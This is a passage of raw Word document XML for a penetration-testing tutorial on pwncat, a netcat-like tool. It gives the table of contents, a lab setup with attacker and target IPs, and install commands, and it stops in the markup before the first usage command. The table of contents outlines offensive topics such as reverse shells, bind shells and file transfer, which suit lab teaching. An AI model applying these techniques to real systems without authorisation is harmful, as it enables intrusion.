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3C63C6" w14:textId="77777777" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00523D79">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">A Detailed Guide on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523D79">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E803061" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> stands out as an open-source Python tool highly regarded for its versatility, providing a contemporary alternative to the traditional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility. Tailored for network exploration, exploitation, and penetration testing needs, it offers a modernized approach to these tasks. With an emphasis on user-friendly features and comprehensive functionality, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> facilitates seamless interactions with network services, aiding in reconnaissance and vulnerability assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CCAB23" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>The official documentation for the usage of this tool can be checked from here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://pwncat.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54CE5CDE" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Table of Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCD93DB" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ADFEEA" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76194659" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ACC163" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Port Scanning and Banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883D2F2" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>As a listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744081E6" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Reverse Shell (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C45BA6" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFCDC54" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">To Send/Receive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B9D4101" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bind Shell (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD3AFEF" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Advantages over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0611454F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9CA73D" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C8AA33" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">In this article, we are going to show the usage of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> on both </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and windows target machines as mentioned below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0836349B" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Target Machines:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> Ubuntu (192.168.1.23), Windows (192.168.1.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228CDC20" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Attacker Machine:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> Kali Linux (192.168.1.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E58BD9" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132BD9A" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Installation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be done using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A09883" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>To install using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06078BB9" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A87D92C" w14:textId="0C51536F"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB4AE35" wp14:editId="06086D2F">
            <wp:extent cx="5731510" cy="420624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206240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A36A30" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>To install using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302DA149" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61912C15" w14:textId="64D19828"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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D8BF3D5" wp14:editId="04CDC37F">
            <wp:extent cx="5731510" cy="189357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893570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955152C" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019EFE7" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Port scanning and Banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E157697" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to perform both port scanning and banner grabbing on the open ports by stating the range of ports along with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>–banner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08735A7F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
